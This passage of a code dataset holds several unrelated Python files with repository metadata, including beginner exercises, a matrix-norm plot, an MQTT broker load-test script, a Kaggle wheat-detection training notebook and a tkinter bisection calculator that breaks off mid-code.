q.append(temp)\n\nprint(len(res))\n","repo_name":"rkdalsdn94/algoalgo","sub_path":"solved_ac/Silver_4/반복수열_2331.py","file_name":"반복수열_2331.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20940516864","text":"# Hacer una función que reciba un entero positivo de exactamente 3 dígitos\r\n# y suma el valor de los digitos\r\n# Entradas: numero\r\n# Salida: suma\r\n# Restricciones: numero >= 0, numero tiene al menos tres digitos\r\ndef suma(numero):\r\n if ((numero >= 100) and (numero <= 999)):\r\n unidad = numero %10\r\n diez = (numero // 10) %10\r\n cien = numero // 100\r\n return cien + diez + unidad\r\n else:\r\n return \"Error\"\r\n","repo_name":"MrWrynn/TutorialPython","sub_path":"FuncionSuma.py","file_name":"FuncionSuma.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31681563130","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n# from fancyimpute import NuclearNormMinimization\nfrom matplotlib import cm\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef coherent_matrix():\n u1 = (np.array([1, 0]) + np.array([0, 1]))/ np.sqrt(2)\n u2 = (np.array([1, 0]) - np.array([0, 1]))/ np.sqrt(2)\n A = np.outer(u1, u2)\n return A\n\ndef matrix_scalar(A: np.ndarray, B: np.ndarray) -> float:\n return np.trace(np.outer(A,B))\n\ndef coherence(U: np.ndarray):\n return 2 * (np.linalg.norm((U @ np.array([1, 0])) * U))**2\n\n\ndef get_dual(base):\n alpha = -1 * base[0][0,1]/ base[1][0,1]\n return alpha\n\nM = np.ones((2, 2), dtype=float)\nM[1,0] = 2\nM[0,0] = 2\n\nprint(f\"Matrix rank: {np.linalg.matrix_rank(M)}\")\nU, s, VT = np.linalg.svd(M, full_matrices=True, compute_uv=True)\n\nprint(f\"U:\\n{U}\")\nprint(f\"VT:\\n{VT}\")\nprint(f\"Singular values {s}\")\n\ndef get_coefficients(A: np.ndarray, orthonormal_base: list) -> tuple:\n l1 = U[:,0]@A@VT[0,:]\n l2 = U[:,1]@A@VT[1,:]\n return l1,l2\n\nM_norm = s.sum()\nprint(f\"M norm {M_norm}\")\nbase = [np.outer(U[:,0], VT[:,0]), np.outer(U[:,1], VT[:,1])]\nprint(f\"Basis vector u1v1^T:\\n{base[0]};\\n Basis vector u2v2^T:\\n{base[1]}\")\nget_coefficients(M, base)\n\nx = np.arange(-5, 5, 0.1)\ny = np.arange(-5, 5, 0.1)\nX, Y = np.meshgrid(x, y)\nZ = np.abs(X) + np.abs(Y)\nfig, ax = plt.subplots(figsize=(6, 6))\nax.contour(X, Y, Z, levels=[M_norm])\nplt.scatter(*s, c='r')\nplt.text(*(1.01*s), \"M\", fontsize=12)\nfor i in np.arange(-10, 10, 0.5):\n A = M.copy()\n A[0, 1] = i\n coeffs = get_coefficients(A, base)\n if i == -10:\n 
plt.text(*(np.array(coeffs) * 1.01), \"feasible set\", fontsize=12)\n plt.scatter(*get_coefficients(A, base), c='b', s=1.5)\n\nplt.scatter(1, get_dual(base), c='b')\nplt.text((1 + 0.01), get_dual(base) * (1.01), \"Y\", fontsize=12)\nprint(f\"Dual Y:\\n {base[0]+get_dual(base)*base[1]}\")\nplt.xlabel(r'$u_1v_1^T$')\nplt.ylabel(r'$u_2v_2^T$')\nplt.show()\n\n\nz = get_coefficients(M, base)\n\nX = np.arange(-5, 5, 0.25)\nY = np.arange(-5, 5, 0.25)\nX, Y = np.meshgrid(X, Y)\nZ = np.abs(X) + np.abs(Y)\n\nfig = plt.figure()\nax = Axes3D(fig, auto_add_to_figure=False)\nfig.add_axes(ax)\nax.plot_surface(X, Y, Z, rstride=1, cstride=1, alpha=.6, cmap=cm.Oranges)\nax.contour(X, Y, Z, 20, lw=1, linestyles=\"solid\")\nsubgradient = base[0]+get_dual(base)*base[1]\nX = np.arange(s[0]-4, s[0]+4, 0.25)\nY = np.arange(s[1]-2, s[1]+2, 0.25)\nX, Y = np.meshgrid(X, Y)\nZ = M_norm + (X-s[0])+ get_dual(base)*(Y-s[1])\nax.plot_surface(X, Y, Z, rstride=1, cstride=1, lw=0.5,cmap=cm.Blues, alpha=.4, antialiased=False)\n#ax.plot_wireframe(X, Y, Z, rstride=5, cstride=5)\n\nM3d = s[0], s[1], np.abs(s[0]) + np.abs(s[1])\nax.scatter(*M3d, c='r')\nax.scatter(*s, 0, c='black')\n\nfor i in np.arange(-5, 5, 0.01):\n A = M.copy()\n A[0, 1] = i\n x, y = get_coefficients(A, base)\n cords = x, y, np.abs(x) + np.abs(y)\n ax.scatter(*cords, c='b')\n # ax.scatter(x, y, 0, c='b', s=1.5)\n\n# ax.view_init(10,50)\nax.set_zlim(0,10)\nplt.show()\n","repo_name":"akrajewska/cost-prophet","sub_path":"cost_prophet/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70748621372","text":"class Pessoa:\n def __init__ (self, email):\n self.email = email\n \n def Saudacao(name):\n print(f'Olá eu sou {name}')\n \nclass Estudante(Pessoa):\n def __init__(self, email, nome):\n super().__init__(email, nome)\n self.nome = nome\n \nclass Professor(Pessoa):\n def __init__(self, email, nome, materia):\n super().__init__(email, nome, materia)\n self.nome = nome\n self.materia = materia\n \np2 = Professor\np2.email = 'Luisa@gmail.com'\np2.nome = 'Luisa'\np2.materia ='Artes'\np2.Saudacao(p2.nome)\nprint(f'A {p2.nome} professora de {p2.materia}, está fazendo login com o email:{p2.email}')\n\n\ne1 = Estudante\ne1.email = 'maria@gmail.com'\ne1.nome = 'maria'\ne1.Saudacao(e1.nome)\nprint(f'A aluna {e1.nome} está fazendo login com o email:{e1.email}')\n\n\n\n\n\n\n","repo_name":"MaVieiraa/portifolio","sub_path":"exemplo/portifolio.py","file_name":"portifolio.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27357624910","text":"#! 
c:\\python34\\python3\n#!/usr/bin/env python\nimport signal\nimport time\nimport json\nimport random\nimport paho.mqtt.client as paho\n# edit these settings\nbroker = \"192.168.1.64\"\nport = 1883\nblocks = 25 # edit for number of blocks\nmessages = 200 # edit for stress messages per block (total msg = messages+(messages*esps))\nmessage_size = 1 # edit for size of message\nM_delay = 0.00001 # delay between messages\nLoop_delay = 2\npub_topic = \"v3/test\"\n\nesps = 200\nbles = 500\nesp_topic = \"espresense/rooms\"\ntotal_msg = messages+(messages*esps)\nusername = \"TestUser\"\npassword = \"TestPassword\"\n# end edit\n\n\ndef on_message(client, userdata, message):\n print(str(message.payload.decode(\"utf-8\")))\n\n\ndef on_connect(client, userdata, flags, rc):\n if rc == 0:\n client.connected_flag = True # set flag\n print(\"connected OK\")\n client.subscribe(\"tests/results\")\n else:\n print(\"Bad connection Returned code=\", rc)\n\n\ndef stress_msg():\n c = str(count).rjust(6, \"0\")\n l = str(loop_count).rjust(6, \"0\")\n mro = str(int(message_rate)).rjust(6, \"0\")\n header = c+DL+l+DL+MS+DL+mro+DL\n header = header.ljust(40, \"P\")\n message = header + msg\n client.publish(pub_topic, message) # publish\n message = \"\"\n\n\ndef rand_mac():\n mac = [0x00, 0x24, 0x81,\n random.randint(0x00, 0x7f),\n random.randint(0x00, 0xff),\n random.randint(0x00, 0xff)]\n\n return ':'.join(map(lambda x: \"%02x\" % x, mac))\n\n\ndef esp_msg(esp_name):\n # {\"id\":\"bc7e8b2e9a71\",\"idType\":55,\"rssi@1m\":-71,\"rssi\":-95,\"raw\":4.85,\"distance\":5.18,\"speed\":-0.02,\"mac\":\"bc7e8b2e9a71\",\"interval\":2800}\n mac = random.choice(ble_macs)\n message = json.dumps({\n \"id\": mac,\n \"idType\": random.choice([15, 20, 40, 55]),\n \"rssi@1m\": -71,\n \"rssi\": random.randint(-95, -53),\n \"raw\": random.randint(0, 4)+random.random(),\n \"distance\": random.randint(0, 5)+random.random(),\n \"speed\": -0.02,\n \"mac\": mac,\n \"interval\": random.randint(300, 3000)})\n client.publish(esp_topic+\"/\"+esp_name, message) # publish\n\nesp_macs = []\nfor i in range(esps):\n esp_macs.append(rand_mac())\n\nble_macs = []\nfor i in range(bles):\n ble_macs.append(rand_mac())\n\nesp_message_size = len('{\"id\":\"bc7e8b2e9a71\",\"idType\":55,\"rssi@1m\":-71,\"rssi\":-95,\"raw\":4.85,\"distance\":5.18,\"speed\":-0.02,\"mac\":\"bc7e8b2e9a71\",\"interval\":2800}'.encode('utf-8'))\n\ncname=\"tx-client-\"+str(int(time.time()))\nclient=paho.Client(cname)\n# assign function to callback #establish connection client1.publish(\"house/bulb1\",\"on\")\n######\nif username != \"\":\n client.username_pw_set(username, password)\nclient.connected_flag=False\nclient.on_message=on_message\nclient.on_connect=on_connect\n#####\nprint(\"connecting to broker \", broker)\nclient.connect(broker, port) # connect\nclient.loop_start()\nwhile not client.connected_flag:\n time.sleep(.1)\nprint(\"subscribing \")\nclient.subscribe(\"test/results\") # subscribe\nprint(\"publishing \")\ncount=1\nmessage_rate=0\nloop_count=0\n\nBC=str(blocks).rjust(6, \"0\")\nMS=str(messages).rjust(6, \"0\")\nBS=str(message_size).rjust(6, \"0\")\nST=\"STARTXXX\"\nET=\"ENDXXXXX\"\nSB=\"X\"*8\nEB=\"Z\"*8\nDL=\"YY\"\nheader=\"\"\n\n\nmsg=\"!\"*message_size\nheader=ST+BC+MS+BS\nclient.publish(pub_topic, header) # publish\nwhile loop_count < blocks:\n # print(\"pub loop\")\n stime=time.time()\n client.publish(pub_topic, SB) # publish\n for count in range(1, messages+1):\n #client.loop(.001)\n stress_msg()\n #time.sleep(M_delay)\n for esp_name in esp_macs:\n 
esp_msg(esp_name)\n #time.sleep(M_delay)\n\n client.publish(pub_topic, EB) # publish\n time_taken=time.time()-stime\n print(f\"Time taken = {time_taken:.3f} \")\n message_rate=total_msg/time_taken\n print(f\"message rate {message_rate:.3f} messages per second\")\n message_rate=((messages*message_size)+(messages*esp_message_size))/time_taken\n print(f\"message rate {message_rate:.3f} Bytes per second\")\n\n time.sleep(Loop_delay)\n count=0\n loop_count += 1\n\nclient.publish(pub_topic, ET) # publish\ntime.sleep(20)\nclient.disconnect() # disconnect\nclient.loop_stop() # stop loop\n","repo_name":"Wrafttex/DRP7","sub_path":"broker-test/broker-stress-tests/esp-stress-test-tx.py","file_name":"esp-stress-test-tx.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"39772746944","text":"def reorderoddeven(arr):\n if len(arr) < 1:\n return\n pbegin = 0\n pend = len(arr)-1\n while pbegin < pend:\n while not is_even(arr[pbegin]):\n pbegin += 1\n while is_even(arr[pend]):\n pend -= 1\n if pbegin < pend:\n temp = arr[pbegin]\n arr[pbegin] = arr[pend]\n arr[pend] = temp\n\n\ndef is_even(num):\n if num & 1:\n return False\n return True\n\n\nif __name__ == \"__main__\":\n test = [1, 2, 3, 4, 5]\n reorderoddeven(test)\n print(test)\n","repo_name":"zhulei2017/Python-Offer","sub_path":"sword-to-offer/14.1.py","file_name":"14.1.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71049308731","text":"import numpy as np\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\nimport matplotlib.patches as patches\n\nimport cv2\n\nfrom os import listdir\n\nfrom os.path import isfile, join\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\nimport torch\n\nimport torchvision\n\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\n\nfrom torchvision.models.detection import FasterRCNN\n\nimport albumentations as A\n\nfrom albumentations.pytorch.transforms import ToTensorV2\nonlyfiles = [f for f in listdir('../input/global-wheat-detection/test/') if isfile(join('../input/global-wheat-detection/test/', f))]\n\n\n\ntest_df = pd.DataFrame(onlyfiles,columns=['image_id'])\ntransform = A.Compose([\n\n ToTensorV2(p=1.0)\n\n ])\n\n\n\n\n\ndef collate_fn(batch):\n\n return tuple(zip(*batch))\nclass WheatTestDataset(Dataset):\n\n\n\n def __init__(self, dataframe, transforms):\n\n super().__init__()\n\n\n\n self.image_ids = dataframe['image_id'].unique()\n\n self.df = dataframe\n\n self.transforms = transforms\n\n\n\n def __getitem__(self, index: int):\n\n\n\n image_id = self.image_ids[index]\n\n records = self.df[self.df['image_id'] == image_id]\n\n\n\n image = cv2.imread('../input/global-wheat-detection/test/'+image_id, cv2.IMREAD_COLOR)\n\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB).astype(np.float32)\n\n image /= 255.0\n\n\n\n sample = {\n\n 'image': image,\n\n }\n\n sample = self.transforms(**sample)\n\n image = sample['image']\n\n\n\n return image, image_id\n\n\n\n def __len__(self) -> int:\n\n return self.image_ids.shape[0]\ntest_dataset = WheatTestDataset(test_df,transform)\n\n\n\ntest_data_loader = DataLoader(\n\n test_dataset,\n\n batch_size=8,\n\n shuffle=False,\n\n num_workers=4,\n\n collate_fn=collate_fn\n\n)\nmodel = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=False,pretrained_backbone=False)\n\nnum_classes 
= 2\n\nin_features = model.roi_heads.box_predictor.cls_score.in_features\n\nmodel.roi_heads.box_predictor\nmodel.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n\nmodel.roi_heads.box_predictor\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\nmodel.to(device)\nmodel.load_state_dict(torch.load('../input/global-wheat-detection-public/fasterrcnn_resnet50_fpn_best.pth'))\n\nmodel.eval()\ndef format_prediction_string(boxes, scores):\n\n pred_strings = []\n\n for j in zip(scores, boxes):\n\n pred_strings.append(\"{0:.4f} {1} {2} {3} {4}\".format(j[0], j[1][0], j[1][1], j[1][2], j[1][3]))\n\n\n\n return \" \".join(pred_strings)\ndetection_threshold = 0.5\n\nresults = []\n\ntestdf_psuedo = []\n\nfor images, image_ids in test_data_loader:\n\n\n\n images = list(image.to(device) for image in images)\n\n outputs = model(images)\n\n\n\n for i, image in enumerate(images):\n\n\n\n boxes = outputs[i]['boxes'].data.cpu().numpy()\n\n scores = outputs[i]['scores'].data.cpu().numpy()\n\n \n\n boxes = boxes[scores >= detection_threshold].astype(np.int32)\n\n scores = scores[scores >= detection_threshold]\n\n image_id = image_ids[i]\n\n \n\n boxes[:, 2] = boxes[:, 2] - boxes[:, 0]\n\n boxes[:, 3] = boxes[:, 3] - boxes[:, 1]\n\n \n\n for box in boxes:\n\n result = {\n\n 'image_id': 'nvnn'+image_id,\n\n 'source': 'nvnn',\n\n 'x': box[0],\n\n 'y': box[1],\n\n 'w': box[2],\n\n 'h': box[3]\n\n }\n\n testdf_psuedo.append(result)\ntest_df_pseudo = pd.DataFrame(testdf_psuedo, columns=['image_id', 'source', 'x', 'y', 'w', 'h'])\n\ntest_df_pseudo.head()\nimport cv2\n\nimg = cv2.imread(\"../input/global-wheat-detection/test/348a992bb.jpg\")\n\nimg = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\nfig,ax = plt.subplots(1)\n\nax.imshow(img)\n\nfor x,y,width,height in test_df_pseudo[test_df_pseudo['image_id'] == \"nvnn348a992bb.jpg\"][['x','y','w','h']].values:\n\n rect = patches.Rectangle((x,y),width,height,linewidth=1,edgecolor='r',facecolor='none')\n\n ax.add_patch(rect)\n\nplt.show()\ntrain_df = pd.read_csv(\"../input/global-wheat-detection/train.csv\")\n\ntrain_df.drop(['width','height'],axis=1,inplace=True)\ntrain_df['x'] = train_df['bbox'].apply(lambda x: int(float(x[1:-1].split(',')[0])))\n\ntrain_df['y'] = train_df['bbox'].apply(lambda x: int(float(x[1:-1].split(',')[1])))\n\ntrain_df['w'] = train_df['bbox'].apply(lambda x: int(float(x[1:-1].split(',')[2])))\n\ntrain_df['h'] = train_df['bbox'].apply(lambda x: int(float(x[1:-1].split(',')[3])))\ntrain_df.drop('bbox',axis=1,inplace=True)\ntrain_df = pd.concat([train_df,test_df_pseudo],axis=0)\n\ntrain_df.reset_index(drop=True,inplace=True)\ntrain_df\ntransform = A.Compose([\n\n ToTensorV2(p=1.0)\n\n ], bbox_params={'format': 'pascal_voc', 'label_fields': ['labels']})\nclass WheatDataset(Dataset):\n\n\n\n def __init__(self, dataframe, transforms):\n\n super().__init__()\n\n\n\n self.image_ids = dataframe['image_id'].unique()\n\n self.df = dataframe\n\n self.transforms = transforms\n\n\n\n def __getitem__(self, index: int):\n\n\n\n image_id = self.image_ids[index]\n\n records = self.df[self.df['image_id'] == image_id]\n\n\n\n if 'nvnn' in image_id:\n\n image_id = image_id[4:]\n\n image = cv2.imread('../input/global-wheat-detection/test/'+image_id, cv2.IMREAD_COLOR)\n\n else:\n\n image = cv2.imread('../input/global-wheat-detection/train/'+image_id+'.jpg', cv2.IMREAD_COLOR)\n\n \n\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB).astype(np.float32)\n\n image /= 255.0\n\n\n\n boxes = records[['x', 'y', 'w', 'h']].values\n\n 
boxes[:, 2] = boxes[:, 0] + boxes[:, 2]\n\n boxes[:, 3] = boxes[:, 1] + boxes[:, 3]\n\n \n\n area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])\n\n area = torch.as_tensor(area, dtype=torch.float32)\n\n\n\n labels = torch.ones((records.shape[0],), dtype=torch.int64) \n\n iscrowd = torch.zeros((records.shape[0],), dtype=torch.int64)\n\n \n\n target = {}\n\n target['boxes'] = boxes\n\n target['labels'] = labels\n\n target['iscrowd'] = iscrowd\n\n target['area'] = area\n\n target['image_id'] = torch.tensor([index])\n\n\n\n sample = {\n\n 'image': image,\n\n 'bboxes': target['boxes'],\n\n 'labels': labels\n\n }\n\n sample = self.transforms(**sample)\n\n image = sample['image']\n\n\n\n target['boxes'] = torch.stack(tuple(map(torch.tensor, zip(*sample['bboxes'])))).permute(1, 0)\n\n return image, target, image_id\n\n\n\n def __len__(self) -> int:\n\n return self.image_ids.shape[0]\nclass Averager:\n\n def __init__(self):\n\n self.current_total = 0.0\n\n self.iterations = 0.0\n\n\n\n def send(self, value):\n\n self.current_total += value\n\n self.iterations += 1\n\n\n\n @property\n\n def value(self):\n\n if self.iterations == 0:\n\n return 0\n\n else:\n\n return 1.0 * self.current_total / self.iterations\n\n\n\n def reset(self):\n\n self.current_total = 0.0\n\n self.iterations = 0.0\ntrain_dataset = WheatDataset(train_df,transform)\ntrain_data_loader = DataLoader(\n\n train_dataset,\n\n batch_size=16,\n\n shuffle=False,\n\n num_workers=4,\n\n collate_fn=collate_fn\n\n)\nmodel.train()\nparams = [p for p in model.parameters() if p.requires_grad]\n\noptimizer = torch.optim.SGD(params, lr=0.01, momentum=0.9, weight_decay=0.0001)\nloss_hist = Averager()\n\n\n\nnum_epochs = 30\nitr = 1\n\n\n\nfor epoch in range(num_epochs):\n\n loss_hist.reset()\n\n \n\n for images, targets, image_ids in train_data_loader:\n\n \n\n images = list(image.to(device) for image in images)\n\n targets = [{k: v.to(device) for k, v in t.items()} for t in targets]\n\n\n\n loss_dict = model(images, targets)\n\n\n\n losses = sum(loss for loss in loss_dict.values())\n\n loss_value = losses.item()\n\n\n\n loss_hist.send(loss_value)\n\n\n\n optimizer.zero_grad()\n\n losses.backward()\n\n optimizer.step()\n\n\n\n if itr % 50 == 0:\n\n print(f\"Iteration #{itr} loss: {loss_value}\")\n\n\n\n itr += 1\n\n \n\n\n\n print(f\"Epoch #{epoch} loss: {loss_hist.value}\")\ntorch.save(model.state_dict(), 'fasterrcnn_resnet50_fpn2nd.pt')\nmodel.eval()\n\ndetection_threshold = 0.5\n\nresults = []\n\n\n\nfor images, image_ids in test_data_loader:\n\n\n\n images = list(image.to(device) for image in images)\n\n outputs = model(images)\n\n\n\n for i, image in enumerate(images):\n\n\n\n boxes = outputs[i]['boxes'].data.cpu().numpy()\n\n scores = outputs[i]['scores'].data.cpu().numpy()\n\n \n\n boxes = boxes[scores >= detection_threshold].astype(np.int32)\n\n scores = scores[scores >= detection_threshold]\n\n image_id = image_ids[i]\n\n \n\n boxes[:, 2] = boxes[:, 2] - boxes[:, 0]\n\n boxes[:, 3] = boxes[:, 3] - boxes[:, 1]\n\n \n\n result = {\n\n 'image_id': image_id,\n\n 'PredictionString': format_prediction_string(boxes, scores)\n\n }\n\n\n\n \n\n results.append(result)\ntest_df = pd.DataFrame(results, columns=['image_id', 'PredictionString'])\n\ntest_df['image_id'] = test_df['image_id'].apply(lambda x: x.split(\".\")[0])\n\ntest_df.head()\ntest_df.to_csv('submission.csv', 
index=False)","repo_name":"aorursy/new-nb-1","sub_path":"aakashveera_notebook-rcnn.py","file_name":"aakashveera_notebook-rcnn.py","file_ext":"py","file_size_in_byte":9424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28651062931","text":"# Se achar necessario, faça import de outras bibliotecas\n\n\n\n\n\n# Crie a função que será avaliada no exercício aqui\ndef soma_dos_aninhados(lista):\n soma = 0\n for sublist in lista:\n for numero in sublist:\n soma += numero\n return soma\n\nlista_de_listas = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10], [11, 12, 13, 14, -1000]]\n\nresultado = soma_dos_aninhados(lista_de_listas)\nprint(resultado)\n\n\n\n\n\n\n\n# Teste a sua função aqui (caso ache necessário)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Modulo3-Inteli-2023-1/lista-semana1-y2keylla","sub_path":"exercicio3.py","file_name":"exercicio3.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2388087208","text":"import os\nfrom pathlib import Path\nimport json\nimport jsonlines\nfrom argparse import ArgumentParser\nimport random\n\n\ndef get_data_by_sz(data_path, data_size, dir_name):\n path = Path(data_path)\n data_files = [os.path.join(path, file.name) for file in path.glob(\"*.json\")]\n for data_file in data_files:\n data = []\n with open(data_file, \"r\", encoding=\"utf8\") as f:\n for line in f:\n data.append(json.loads(line))\n\n file_name = \"_\".join(os.path.split(data_file)[-1].split(\"_\")[:-1])\n\n if isinstance(data_size, int):\n assert len(data) >= data_size\n selected_data = random.sample(data, k=data_size)\n elif isinstance(data_size, dict):\n if file_name in data_size:\n sz = data_size[file_name]\n elif data_size[\"others\"] == \"uniform\":\n sz = 1305 # uniformly replenish data from other abilities\n if file_name==\"biology\":\n sz = None # use all biology data as its full size may not be sufficient\n elif file_name==\"chinese\":\n sz += 1 # add the reminder to keep the total quantity == 10k.\n elif data_size[\"others\"] == \"max\":\n sz = None # use all available data for other abilities\n selected_data = data[:sz]\n\n file_name = \"_\".join(os.path.split(data_file)[-1].split(\"_\")[:-1])\n with jsonlines.open(dir_name + \"/\" + file_name + \".json\", \"w\") as writer:\n for sample in selected_data:\n writer.write(sample)\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\n \"--data_type\", type=str, default=None,\n choices=[\"curated-10\", \"curated-40\", \"curated-160\", \"curated-640\", \"curated-2560\", \"curated-10000\",\n \"synthetic-10\", \"synthetic-40\", \"synthetic-160\", \"synthetic-640\", \"synthetic-2560\", \"synthetic-10000\",\n \"synthetic-40960\", \"baseline\", \"reconstruct\", \"maximum\", \"mix-0\", \"mix-2560\", \"mix-40960\"]\n )\n args = parser.parse_args()\n\n random.seed(0)\n dir_name = \"data/\" + args.data_type\n os.makedirs(dir_name, exist_ok=True)\n\n if args.data_type == \"baseline\":\n args.data_type = \"curated-10000\"\n print(\"Type 'baseline' is equivalent to 'curated-10000'.\")\n\n if args.data_type == \"mix-0\":\n args.data_type = \"maximum\"\n print(\"Type 'mix-0' is equivalent to 'maximum'.\")\n\n if \"curated\" in args.data_type:\n data_path = \"data/curated/1000\"\n data_size = int(args.data_type.split(\"-\")[-1]) // 10\n get_data_by_sz(data_path, data_size, dir_name)\n elif \"synthetic\" in args.data_type:\n data_path = \"data/synthetic/40960\"\n data_size = 
int(args.data_type.split(\"-\")[-1])\n get_data_by_sz(data_path, data_size, dir_name)\n elif args.data_type == \"reconstruct\":\n data_path = \"data/curated/full\"\n data_size = {\"ethics\":64, \"role_play\":64, \"creative_writing\":1000, \"others\": \"uniform\"}\n get_data_by_sz(data_path, data_size, dir_name)\n elif args.data_type == \"maximum\":\n data_path = \"data/curated/full\"\n data_size = {\"ethics\":64, \"role_play\":64, \"creative_writing\":1000, \"others\": \"max\"}\n get_data_by_sz(data_path, data_size, dir_name)\n elif \"mix\" in args.data_type:\n # mix two data sources\n data_path = \"data/curated/full\"\n data_size = {\"ethics\": 64, \"role_play\": 64, \"creative_writing\": 1000, \"others\": \"max\"}\n get_data_by_sz(data_path, data_size, dir_name)\n\n data_path = \"data/synthetic/40960\"\n data_size = int(args.data_type.split(\"-\")[-1])\n get_data_by_sz(data_path, data_size, dir_name)\n\n print(\"Make Data Done!\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ChiyuSONG/dynamics-of-instruction-tuning","sub_path":"make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"23312381328","text":"import tkinter\nfrom customtkinter import *\nfrom tkinter import messagebox\nfrom math import *\n\n\ndef f(x, exp):\n # Using eval() safely in Python ref: https://lybniz2.sourceforge.net/safeeval.html\n safe_list = ['math', 'acos', 'asin', 'atan', 'atan2', 'ceil', 'cos', 'cosh', 'degrees', 'e', 'exp', 'fabs', 'floor',\n 'fmod', 'frexp', 'hypot', 'ldexp', 'log', 'log10', 'modf', 'pi', 'pow', 'radians', 'sin', 'sinh', 'sqrt', 'tan', 'tanh']\n # use the list to filter the local namespace\n safe_dict = dict([(k, locals().get(k, k)) for k in safe_list])\n safe_dict['x'] = x\n return (eval(exp, {\"__builtins__\": None}, safe_dict))\n\n\ndef bisect(a, b, es, imax, f, exp):\n i = 0\n c = b\n fa = f(a, exp)\n fc = f(b, exp)\n res = [[\"iterasi\", \"a\", \"b\", \"c\", \"f(a)\", \"f(c)\", \"f(a).f(c)\", \"e\"]]\n\n if (fa * fc > 0):\n return -1\n\n while (True):\n # cold = c\n c = (a + b) / 2\n fc = f(c, exp)\n i += 1\n\n if (c != 0):\n # ea = abs((c - cold) / c)\n ea = abs(fc)\n\n test = fa * fc\n\n res.append([\n \"{}\".format(i), \"{:.6f}\".format(a), \"{:.6f}\".format(b),\n \"{:.6f}\".format(c), \"{:.6f}\".format(fa), \"{:.6f}\".format(fc),\n \"{:.6f}\".format(test), \"{:.6f}\".format(ea)\n ])\n\n if (test < 0):\n b = c\n elif (test > 0):\n a = c\n fa = fc\n else:\n ea = 0\n\n if (ea < es or i >= imax):\n break\n\n return [res, c, ea, i]\n\n\nclass InputFrame(CTkFrame):\n def __init__(self, master):\n super().__init__(master)\n self.grid_columnconfigure(3, weight=1)\n self.grid_rowconfigure(2, weight=1)\n\n # Expression Input\n self.exp_label = CTkLabel(\n self, text=\"Fungsi\", fg_color=\"gray30\", corner_radius=6)\n self.exp_label.grid(\n row=0, column=0, padx=10, pady=(10, 0), sticky=\"ew\", columnspan=2)\n self.exp_entry = CTkEntry(self, corner_radius=6)\n self.exp_entry.grid(row=0, column=2, padx=10, pady=(\n 10, 0), sticky=\"ew\", columnspan=2)\n\n # Interval (a & b) Input\n self.a_label = CTkLabel(\n self, text=\"Batas Bawah\", fg_color=\"gray30\", corner_radius=6)\n self.a_label.grid(\n row=1, column=0, padx=10, pady=(10, 0), sticky=\"ew\")\n self.a_entry = CTkEntry(self, corner_radius=6)\n self.a_entry.grid(\n row=1, column=1, padx=10, pady=(10, 0), sticky=\"ew\")\n self.b_label = CTkLabel(\n self, text=\"Batas Atas\", fg_color=\"gray30\", 
corner_radius=6)\n self.b_label.grid(\n row=1, column=2, padx=10, pady=(10, 0), sticky=\"ew\")\n self.b_entry = CTkEntry(self, corner_radius=6)\n self.b_entry.grid(\n row=1, column=3, padx=10, pady=(10, 0), sticky=\"ew\")\n\n self.es_label = CTkLabel(\n self, text=\"Toleransi Error\", fg_color=\"gray30\", corner_radius=6)\n self.es_label.grid(\n row=2, column=0, padx=10, pady=10, sticky=\"ew\")\n self.es_entry = CTkEntry(self, corner_radius=6)\n self.es_entry.grid(\n row=2, column=1, padx=10, pady=10, sticky=\"ew\")\n self.imax_label = CTkLabel(\n self, text=\"Iterasi Maksimum\", fg_color=\"gray30\", corner_radius=6)\n self.imax_label.grid(\n row=2, column=2, padx=10, pady=10, sticky=\"ew\")\n self.imax_entry = CTkEntry(self, corner_radius=6)\n self.imax_entry.grid(\n row=2, column=3, padx=10, pady=10, sticky=\"ew\")\n\n def get_exp(self):\n return self.exp_entry.get()\n\n def get_a(self):\n return self.a_entry.get()\n\n def get_b(self):\n return self.b_entry.get()\n\n def get_es(self):\n return self.es_entry.get()\n\n def get_imax(self):\n return self.imax_entry.get()\n\n def reset(self):\n self.exp_entry.delete(0, END)\n self.a_entry.delete(0, END)\n self.b_entry.delete(0, END)\n self.es_entry.delete(0, END)\n self.imax_entry.delete(0, END)\n\n\nclass ButtonFrame(CTkFrame):\n def __init__(self, master):\n super().__init__(master)\n self.grid_columnconfigure(1, weight=1)\n\n self.calc_button = CTkButton(\n self, text=\"Hitung\", command=master.calculate)\n self.calc_button.grid(\n row=0, column=0, padx=10, pady=0, 